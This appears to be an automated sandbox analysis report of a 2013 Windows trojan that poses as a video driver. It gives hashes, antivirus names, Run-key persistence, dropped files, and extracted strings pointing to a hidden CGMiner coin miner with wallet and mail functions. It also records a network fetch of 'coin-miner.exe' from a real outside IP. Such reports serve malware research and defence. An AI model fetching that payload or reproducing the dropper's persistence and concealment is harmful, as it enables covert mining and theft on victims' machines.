Analysis Date2013-12-23 13:04:40
MD551381dfc55bef73328be1fe3856a43a9
SHA1d56bfc24a9092fc2a02cc3564c769e230882ebd2

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
Section.text md5: 0144f0636f041fec02fd0eb6c30ad933 sha1: 6d214f9a7efedb356cf924c651de7c43489e4704 size: 13312
Section.rsrc md5: 35d592f15ca4a31e90a17aa388d68655 sha1: e6b9af945bc14f2e4ec2f50ce084c74235d0cad6 size: 1024
Section.reloc md5: cbea99d0d542559ffcd3e3ee5f3dc4c6 sha1: a7fc7b7393b3ba9afaf1f0a2aed85b7654609c8a size: 1024
Timestamp2013-12-15 18:56:22
VersionLegalCopyright:
Assembly Version: 1.0.0.0
InternalName: videodriverm.exe
FileVersion: 1.0.0.0
ProductVersion: 1.0.0.0
FileDescription:
OriginalFilename: videodriverm.exe
PackerMicrosoft Visual C# v7.0 / Basic .NET
PEhash0f52ac0f3cf8be34955c70a94d0f8ce57a9e83a8
AVavgGeneric35.ATNL
AVaviraTR/Downloader.A.974
AVmcafeeRDN/Generic Downloader.x!ja
AVmsseTrojan:MSIL/Remdobe.E

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverScan ➝
C:\Documents and Settings\Administrator\Application Data\VideoDrivers\videodriverm.exe\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\ROUTER
Creates FilePIPE\wkssvc
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\VideoDrivers\videodriver.exe
Creates Process"C:\WINDOWS\system32\CMD.exe" /C attrib -s -h C:\Documents and Settings\Administrator\Application Data\VideoDrivers
Creates Processdw20.exe -x -s 996
Creates Mutexgoblmah371z
Creates MutexGlobal\.net clr networking
Creates MutexGlobal\CLR_RESERVED_MUTEX_NAME
Starts ServiceRASMAN

Process
↳ "C:\WINDOWS\system32\CMD.exe" /C attrib -s -h C:\Documents and Settings\Administrator\Application Data\VideoDrivers

Creates Processattrib -s -h C:\Documents and Settings\Administrator\Application Data\VideoDrivers

Process
↳ Pid 800

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ Pid 1108

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1804

Process
↳ Pid 1100

Process
↳ dw20.exe -x -s 996

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dw.log
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\1874B.dmp

Process
↳ attrib -s -h C:\Documents and Settings\Administrator\Application Data\VideoDrivers

Network Details:

HTTP GEThttp://192.40.57.179/sovikat/coin-miner.exe
User-Agent:
Flows TCP192.168.1.1:1032 ➝ 192.40.57.179:80
Flows TCP192.168.1.1:1032 ➝ 192.40.57.179:80

Raw Pcap
0x00000000 (00000)   47455420 2f736f76 696b6174 2f636f69   GET /sovikat/coi
0x00000010 (00016)   6e2d6d69 6e65722e 65786520 48545450   n-miner.exe HTTP
0x00000020 (00032)   2f312e31 0d0a486f 73743a20 3139322e   /1.1..Host: 192.
0x00000030 (00048)   34302e35 372e3137 390d0a43 6f6e6e65   40.57.179..Conne
0x00000040 (00064)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x00000050 (00080)   650d0a0d 0a                           e....


Strings
000004b0
1.0.0.0
appdata
Assembly Version
CGMiner.exe
diablo130302.cl
diakgcn121016.cl
DriverScan
FileDescription
FileVersion
InternalName
LegalCopyright
libcurl-4.dll
libeay32.dll
libidn-11.dll
librtmp.dll
libssh2.dll
OriginalFilename
 -p 
phatk121016.cl
poclbm130302.cl
ProductVersion
scrypt130511.cl
--scrypt -o
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ssleay32.dll
StringFileInfo
Translation
 -u 
VarFileInfo
videodriverm.exe
\VideoDrivers
\VideoDrivers\diablo130302.cl
\VideoDrivers\diakgcn121016.cl
\VideoDrivers\libcurl-4.dll
\VideoDrivers\libeay32.dll
\VideoDrivers\libidn-11.dll
\VideoDrivers\librtmp.dll
\VideoDrivers\libssh2.dll
\VideoDrivers\phatk121016.cl
\VideoDrivers\poclbm130302.cl
\VideoDrivers\scrypt130511.cl
\VideoDrivers\ssleay32.dll
\VideoDrivers\videodriverm.exe
\VideoDrivers\videodrivers.exe
\VideoDrivers\zlib1.dll
VS_VERSION_INFO
[WALLETTYPE]
zlib1.dll
1.0.0.0
4System.Web.Services.Protocols.SoapHttpClientProtocol
8.0.0.0
AccessControlType
Activator
AddAccessRule
add_Exited
Application
ApplicationBase
AssemblyCompanyAttribute
AssemblyCopyrightAttribute
AssemblyDescriptionAttribute
AssemblyFileVersionAttribute
AssemblyProductAttribute
AssemblyTitleAttribute
Attachment
AttachmentCollection
.cctor
ClearProjectError
Collection`1
CompilationRelaxationsAttribute
CompilerGeneratedAttribute
Computer
ComVisibleAttribute
Concat
Conversions
Convert
_CorExeMain
CreateDirectory
CreateInstance
Create__Instance__
DebuggerHiddenAttribute
Directory
DirectoryInfo
DirectorySecurity
Dispose__Instance__
DownloadFile
dwFlags
EditorBrowsableAttribute
EditorBrowsableState
Environ
Environment
Equals
EventArgs
EventHandler
Exception
Exists
FileSystemAccessRule
FileSystemRights
FileSystemSecurity
GeneratedCodeAttribute
get_Application
get_Attachments
get_Computer
GetCurrent
GetCurrentProcess
get_CurrentUser
get_FileName
get_GetInstance
GetHashCode
GetInstance
get_Length
get_MainModule
GetModuleFileName
GetModuleFileNameA
get_Name
GetObjectValue
get_Registry
get_StartInfo
get_To
GetType
GetTypeFromHandle
get_User
get_WebServices
HelpKeywordAttribute
HideModuleNameAttribute
hModule
ICredentialsByHost
InAttribute
InheritanceFlags
instance
Interaction
kernel32
lpExistingFileName
lpFileName
lpNewFileName
MailAddress
MailAddressCollection
MailMessage
m_AppObjectProvider
MarshalAsAttribute
m_ComputerObjectProvider
Microsoft.VisualBasic
Microsoft.VisualBasic.ApplicationServices
Microsoft.VisualBasic.CompilerServices
Microsoft.VisualBasic.Devices
Microsoft.VisualBasic.MyServices
Microsoft.Win32
m_MyWebServicesObjectProvider
<Module>
MoveFile
MoveFileExW
mscoree.dll
mscorlib
m_ThreadStaticValue
m_UserObjectProvider
MyApplication
My.Application
MyComputer
My.Computer
MyGroupCollectionAttribute
MyProject
MyTemplate
My.User
MyWebServices
My.WebServices
NetworkCredential
Object
OpenExisting
OpenSubKey
Process
ProcessModule
ProcessStartInfo
ProcessWindowStyle
ProjectData
PropagationFlags
RegistryKey
RegistryProxy
@.reloc
`.rsrc
RuntimeCompatibilityAttribute
RuntimeHelpers
RuntimeTypeHandle
sender
ServerComputer
set_Arguments
set_Body
set_CreateNoWindow
set_Credentials
set_EnableRaisingEvents
set_EnableSsl
set_FileName
set_From
set_Port
SetProjectError
set_StartInfo
set_Subject
SetValue
set_WindowStyle
SmtpClient
StandardModuleAttribute
STAThreadAttribute
String
Strings
#Strings
System
System.CodeDom.Compiler
System.Collections.ObjectModel
System.ComponentModel
System.ComponentModel.Design
System.Diagnostics
System.IO
System.Net
System.Net.Mail
System.Reflection
System.Runtime.CompilerServices
System.Runtime.InteropServices
System.Security.AccessControl
System.Security.Principal
System.Threading
!This program cannot be run in DOS mode.
Thread
ThreadSafeObjectProvider`1
ThreadStaticAttribute
ToChar
ToCharArray
ToInteger
ToString
UnmanagedType
v2.0.50727
videodriverm
videodriverm.exe
WalletSend
WebClient
WebServices
WindowsIdentity
WrapNonExceptionThrows